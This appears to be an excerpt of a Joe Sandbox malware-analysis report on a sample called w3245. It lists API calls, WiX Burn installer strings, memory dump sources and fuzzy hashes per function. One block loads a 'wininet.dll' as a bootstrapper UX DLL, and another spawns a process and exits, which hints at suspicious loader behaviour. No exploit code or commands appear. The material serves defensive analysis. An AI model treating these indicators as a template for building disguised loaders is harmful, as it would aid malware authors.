                                                                                                                                                                    • variable.cpp, xrefs: 00C86E4B
                                                                                                                                                                    • Setting string variable '%ls' to value '%ls', xrefs: 00C86EED
                                                                                                                                                                    • Failed to insert variable '%ls'., xrefs: 00C86E0D
                                                                                                                                                                    • Failed to set value of variable: %ls, xrefs: 00C86F41
                                                                                                                                                                    • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00C86ED0
                                                                                                                                                                    • Setting hidden variable '%ls', xrefs: 00C86E86
                                                                                                                                                                    • Attempt to set built-in variable value: %ls, xrefs: 00C86E56
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                    • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                                    • API String ID: 2716280545-445000439
                                                                                                                                                                    • Opcode ID: 55bb1e52f189505c8c449873a9287776d260b16a560e86e0795e10fb67cdc1cb
                                                                                                                                                                    • Instruction ID: dc106633c1fe065971e5b963d7db15eba47cca3f7f9ad9ab8d5969ede7b63055
                                                                                                                                                                    • Opcode Fuzzy Hash: 55bb1e52f189505c8c449873a9287776d260b16a560e86e0795e10fb67cdc1cb
                                                                                                                                                                    • Instruction Fuzzy Hash: A7512A71A40225E7CB30BF55CC4AF6B3BA8EB51708F20002DF95566282C271ED41CBE9
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsWindow.USER32(?), ref: 00C84C64
                                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C84C75
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set layout directory variable to value provided from command-line., xrefs: 00C84C06
                                                                                                                                                                    • Failed to create the message window., xrefs: 00C84B98
                                                                                                                                                                    • Failed to query registration., xrefs: 00C84BAE
                                                                                                                                                                    • Failed while running , xrefs: 00C84C2A
                                                                                                                                                                    • Failed to set registration variables., xrefs: 00C84BDE
                                                                                                                                                                    • WixBundleLayoutDirectory, xrefs: 00C84BF5
                                                                                                                                                                    • Failed to open log., xrefs: 00C84B18
                                                                                                                                                                    • Failed to check global conditions, xrefs: 00C84B49
                                                                                                                                                                    • Failed to set action variables., xrefs: 00C84BC4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessagePostWindow
                                                                                                                                                                    • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                                                    • API String ID: 3618638489-3051724725
                                                                                                                                                                    • Opcode ID: 0b0441b8c90fb2d10162e5ce3ccf746adb8c8ac05e738bf8d2b015b8c9290de4
                                                                                                                                                                    • Instruction ID: 8c0b8cfe07dfca57546223ce5745867d5426472c8443eccc8bf36a0416c74b15
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b0441b8c90fb2d10162e5ce3ccf746adb8c8ac05e738bf8d2b015b8c9290de4
                                                                                                                                                                    • Instruction Fuzzy Hash: 2B41E871601A2BBBCB1E7A60CC4AFBAB66CFF00759F004229F815A7150EB70ED54A7D4
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00C8548E,?,?), ref: 00C9EA9D
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C8548E,?,?), ref: 00C9EAAA
                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 00C9EB03
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C8548E,?,?), ref: 00C9EB10
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00C8548E,?,?), ref: 00C9EB4B
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00C8548E,?,?), ref: 00C9EB6A
                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,00C8548E,?,?), ref: 00C9EB77
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                     • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                    • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                                    • API String ID: 2351989216-3599963359
                                                                                                                                                                    • Opcode ID: 1d85fe17b3bbe7cd723c94227283c1a23378113d03d6fd41dcd4d68a8d310a82
                                                                                                                                                                    • Instruction ID: e98c5fc500fa12f2866a65509ef862a62a123e5d06aa303f0d8411067ad5e10b
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d85fe17b3bbe7cd723c94227283c1a23378113d03d6fd41dcd4d68a8d310a82
                                                                                                                                                                    • Instruction Fuzzy Hash: A7317276D01229BBDB10DFD98D89A9EBBACFF14750F11016AF915F7280E6309E009AA5
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,00C85405,00C853BD,00000000,00C85445), ref: 00CA1506
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00CA1519
                                                                                                                                                                    • GetExitCodeThread.KERNELBASE(00CCB488,?), ref: 00CA155B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00CA1569
                                                                                                                                                                    • ResetEvent.KERNEL32(00CCB460), ref: 00CA15A4
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00CA15AE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                     • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                                    • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2979751695-3400260300
                                                                                                                                                                    • Opcode ID: 0381ecc0f3d1f1a56d66112b82abb3e2628c97f67aca9dd27beba687a54aad56
                                                                                                                                                                    • Instruction ID: 5f56df6bcb6e05eac66559437cdba145d0deec69993ff38d760517a53cc14d84
                                                                                                                                                                    • Opcode Fuzzy Hash: 0381ecc0f3d1f1a56d66112b82abb3e2628c97f67aca9dd27beba687a54aad56
                                                                                                                                                                    • Instruction Fuzzy Hash: 7C31B4B1E40206EBDB109FA6CD05BAE77F8EB45714F14416BFD16D62A0E730CE00AB65
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00C82E5F
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C82E69
                                                                                                                                                                    • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00C82F09
                                                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00C82F96
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C82FA3
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00C82FB7
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00C8301F
                                                                                                                                                                    Strings
                                                                                                                                                                    • pathutil.cpp, xrefs: 00C82E8D
                                                                                                                                                                    • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00C82F66
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                     • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                                    • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                                    • API String ID: 3480017824-1101990113
                                                                                                                                                                    • Opcode ID: cc2b9e5d1eb6a25be5992d7968e9d89c3da610ddfa2543e80abed16d52c3f348
                                                                                                                                                                    • Instruction ID: 7c24e5261c6b3fef5b288a6ed7d189f642dedc665a6ebffe0aaa25a96722d987
                                                                                                                                                                    • Opcode Fuzzy Hash: cc2b9e5d1eb6a25be5992d7968e9d89c3da610ddfa2543e80abed16d52c3f348
                                                                                                                                                                    • Instruction Fuzzy Hash: 0F715272D01139ABDB31AFA4DC4DBAEB7B8AB08715F100195FA15E7190D7349E80DFA8
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,00C853BD,00000000,00C85489,00C85445,WixBundleUILevel,840F01E8,?,00000001), ref: 00C8CC1C
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to extract file., xrefs: 00C8CCE7
                                                                                                                                                                    • Failed to ensure directory exists, xrefs: 00C8CCEE
                                                                                                                                                                    • Failed to get next stream., xrefs: 00C8CD03
                                                                                                                                                                    • payload.cpp, xrefs: 00C8CD1D
                                                                                                                                                                    • Payload was not found in container: %ls, xrefs: 00C8CD29
                                                                                                                                                                    • Failed to get directory portion of local file path, xrefs: 00C8CCF5
                                                                                                                                                                    • Failed to concat file paths., xrefs: 00C8CCFC
                                                                                                                                                                    • Failed to find embedded payload: %ls, xrefs: 00C8CC48
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                     • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                                    • API String ID: 1825529933-1711239286
                                                                                                                                                                    • Opcode ID: c4df28390a5770d0bb36dba9b73ce0e50d1eef12a932c4025c0fc220580311fb
                                                                                                                                                                    • Instruction ID: dd86715c8d2b6928d53570f4b9fd563a2b127e7ff2e9ef17e6efb43a0fb023ae
                                                                                                                                                                    • Opcode Fuzzy Hash: c4df28390a5770d0bb36dba9b73ce0e50d1eef12a932c4025c0fc220580311fb
                                                                                                                                                                    • Instruction Fuzzy Hash: E241C131900215EBCF25BF59CCC5EAEBBA5BF00718F10817EE915AB251D7709E41EBA8
                                                                                                                                                                    APIs
                                                                                                                                                                    • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 00C847BB
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C847C1
                                                                                                                                                                    • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C8484F
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to load UX., xrefs: 00C84804
                                                                                                                                                                    • wininet.dll, xrefs: 00C847EE
                                                                                                                                                                    • Failed to create engine for UX., xrefs: 00C847DB
                                                                                                                                                                    • engine.cpp, xrefs: 00C8489B
                                                                                                                                                                    • Failed to start bootstrapper application., xrefs: 00C8481D
                                                                                                                                                                    • Unexpected return value from message pump., xrefs: 00C848A5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                     • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message$CurrentPeekThread
                                                                                                                                                                    • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                                                                    • API String ID: 673430819-2573580774
                                                                                                                                                                    • Opcode ID: e05598249480a7c7f64c0ddaa4089320612635c0d612c779358d97659b3c4e62
                                                                                                                                                                    • Instruction ID: 3c07d58abee82840468fbb9c59ec24973ad81d45e1888fce8770095e1fba25ea
                                                                                                                                                                    • Opcode Fuzzy Hash: e05598249480a7c7f64c0ddaa4089320612635c0d612c779358d97659b3c4e62
                                                                                                                                                                    • Instruction Fuzzy Hash: D841A371A00556FFDB18ABA4CC86FBEB7ACEF04318F100129F915E7290DB30AD4597A4
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,00C847FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00C8548E,?), ref: 00C8D6DA
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C847FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00C8548E,?,?), ref: 00C8D6E7
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 00C8D71F
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C847FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00C8548E,?,?), ref: 00C8D72B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                     • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                    • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                                    • API String ID: 1866314245-2276003667
                                                                                                                                                                    • Opcode ID: 1aa864e04c9061c2bf7e26a4375a6cf61bf0fe33cf6637cc87cceea42bf5a9cd
                                                                                                                                                                    • Instruction ID: e847a7ecd679d358c2f01afb205b340ed072f7b3a26d70b6abd540cd175f215d
                                                                                                                                                                    • Opcode Fuzzy Hash: 1aa864e04c9061c2bf7e26a4375a6cf61bf0fe33cf6637cc87cceea42bf5a9cd
                                                                                                                                                                    • Instruction Fuzzy Hash: 9411B677A80B36A7D72167D5DC05F1B6794AB05B65F01053DFE55EB1C0D620DC0047D8
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00C8F942
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00C8F94F
                                                                                                                                                                    Strings
                                                                                                                                                                    • Resume, xrefs: 00C8F8B6
                                                                                                                                                                    • Failed to format pending restart registry key to read., xrefs: 00C8F846
                                                                                                                                                                    • Failed to read Resume value., xrefs: 00C8F8D8
                                                                                                                                                                    • Failed to open registration key., xrefs: 00C8F8AB
                                                                                                                                                                    • %ls.RebootRequired, xrefs: 00C8F82F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close
                                                                                                                                                                    • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                                    • API String ID: 3535843008-3890505273
                                                                                                                                                                    • Opcode ID: cebd4cb1c661c27347c880c2b72d6899bd5be3ce9cb124655944e1464af67f2b
                                                                                                                                                                    • Instruction ID: 1dcf75b1b18785196029b22d881c38ff6aab71282dc7c2023ef9c5502a880dfe
                                                                                                                                                                    • Opcode Fuzzy Hash: cebd4cb1c661c27347c880c2b72d6899bd5be3ce9cb124655944e1464af67f2b
                                                                                                                                                                    • Instruction Fuzzy Hash: B7415271900119FFCB11AF99C841BADBBB4FB05318F55417EE921AB250C3719E52DB54
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32 ref: 5BB31342
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 5BB31357
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 5BB31363
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00000104), ref: 5BB31377
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 5BB313E9
                                                                                                                                                                    • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 5BB313FF
                                                                                                                                                                    • Sleep.KERNELBASE ref: 5BB31407
                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 5BB3140C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$ModuleProcess$CreateExitFileHandleNameSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1148150840-0
                                                                                                                                                                    • Opcode ID: f0dd7a59c0bd5b43b3f9e5f35ad75e2b2e8d3d451f964b30678343650819a50a
                                                                                                                                                                    • Instruction ID: 29308b35581844d5fbda9ce5f776adae6960d5a29273f979bf2b02e5f9c33764
                                                                                                                                                                    • Opcode Fuzzy Hash: f0dd7a59c0bd5b43b3f9e5f35ad75e2b2e8d3d451f964b30678343650819a50a
                                                                                                                                                                    • Instruction Fuzzy Hash: C521A172504314AFE712ABA4CC44AABBBEDFF48344F10442CF181A3590FBF6A844D792
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00CEB5FC,00000000,?,?,?,00C94207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00C854FA,?), ref: 00CC0533
                                                                                                                                                                    • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,00CEB5F4,?,00C94207,00000000,Setup), ref: 00CC05D7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C94207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00C854FA,?,?,?), ref: 00CC05E7
                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00C94207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00C854FA,?), ref: 00CC0621
                                                                                                                                                                      • Part of subcall function 00C82DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00C82F09
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00CEB5FC,?,?,00CEB5F4,?,00C94207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00C854FA,?), ref: 00CC067A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                                    • String ID: logutil.cpp
                                                                                                                                                                    • API String ID: 4111229724-3545173039
                                                                                                                                                                    • Opcode ID: 2e051ece6806d8536bfd75fd9287b4702e2d6dc715b330666320e3d66663c6b3
                                                                                                                                                                    • Instruction ID: 3bfd8e04fb4f3508288ca00f1c4ecd447815d2f62ac8c310592a04179f4e602c
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e051ece6806d8536bfd75fd9287b4702e2d6dc715b330666320e3d66663c6b3
                                                                                                                                                                    • Instruction Fuzzy Hash: D031E77190126AFFDB219FA5CD8AF7E7768EB00755F100129FD10AB160D770DE60ABA4
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to write during cabinet extraction., xrefs: 00CA0C35
                                                                                                                                                                    • Unexpected call to CabWrite()., xrefs: 00CA0BC1
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA0C2B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                    • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                                    • API String ID: 1970631241-3111339858
                                                                                                                                                                    • Opcode ID: c7b32885f2ff9f086a982dbeb7f0e68d4175beac42705d12e35a6167cf135872
                                                                                                                                                                    • Instruction ID: a3b460157d54a8f765b5a53962f65f12c4c38166279381c2b7cd3267f47c4c82
                                                                                                                                                                    • Opcode Fuzzy Hash: c7b32885f2ff9f086a982dbeb7f0e68d4175beac42705d12e35a6167cf135872
                                                                                                                                                                    • Instruction Fuzzy Hash: 10210176540202ABCB10DF5DD985E5A37B8FF89768F21015AFE14C7342E632EE00DB61
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenProcessToken.ADVAPI32(?,00000008,?,00C853BD,00000000,?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC0897
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC08A1
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC08D3
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC08EC
                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC092B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
